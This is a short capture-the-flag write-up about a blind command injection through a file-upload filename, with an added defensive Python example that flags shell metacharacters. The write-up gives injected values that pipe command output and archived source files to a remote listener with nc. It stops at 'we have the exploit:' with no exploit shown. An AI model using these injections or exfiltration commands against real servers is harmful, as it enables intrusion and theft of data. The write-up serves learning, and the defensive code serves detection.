This challenge was solved, and this write-up was written, by teammates nguyen and akg.
Testing showed that the challenge has a blind command injection in the filename of a file upload.
Set up a host listening on a port and inject a command, e.g.:
filename.txt; ls |nc ip port
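A defender-side view of the bug above, as an added example that is not part of the original write-up or the challenge's code: it parses the upload's Content-Disposition header, flags filenames carrying shell metacharacters, and shows that a filename passed as an argv element is never interpreted by a shell. The server's real handling is not shown on the page, so the function names, the allowlist and the sample headers are assumptions.

```python
import re
import subprocess
import sys
import uuid
from email.message import Message

# Characters a POSIX shell interprets; none belongs in an upload filename.
SHELL_META = re.compile(r"""[;|&$`<>(){}\\'"*?!~\n\r]""")
# Hypothetical allowlist: plain basename, no path separators or spaces.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,99}")

def filename_from_header(content_disposition):
    """Extract the filename parameter of a multipart Content-Disposition value."""
    msg = Message()
    msg["Content-Disposition"] = content_disposition
    return msg.get_filename()

def assess_upload(content_disposition):
    """Return (verdict, stored_name) for one uploaded part."""
    name = filename_from_header(content_disposition)
    if not name:
        return "reject:no-filename", None
    if SHELL_META.search(name):
        return "alert:shell-metachar", None
    if not SAFE_NAME.fullmatch(name):
        return "reject:not-allowlisted", None
    # Store under a server-generated name; keep the client name as metadata only.
    return "ok", uuid.uuid4().hex

def echo_without_shell(untrusted):
    """Hand untrusted text to a child process as one argv element (no shell)."""
    child = [sys.executable, "-c", "import sys; print(sys.argv[1])", untrusted]
    out = subprocess.run(child, capture_output=True, text=True, check=True)
    return out.stdout.rstrip("\n")

if __name__ == "__main__":
    # Constructed sample headers; the first carries the filename from the write-up.
    samples = [
        'form-data; name="file"; filename="filename.txt; ls |nc ip port"',
        'form-data; name="file"; filename="notes.txt"',
        'form-data; name="file"; filename="../../backup.gz"',
    ]
    for header in samples:
        print(assess_upload(header), "<-", header)
    # With an argv list the metacharacters arrive as literal text, unexecuted.
    print(echo_without_shell("filename.txt; ls |nc ip port"))
```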
To copy the source:
find .. -iname '*gz'|xargs cat|nc ip port
After analyzing it, we have the exploit: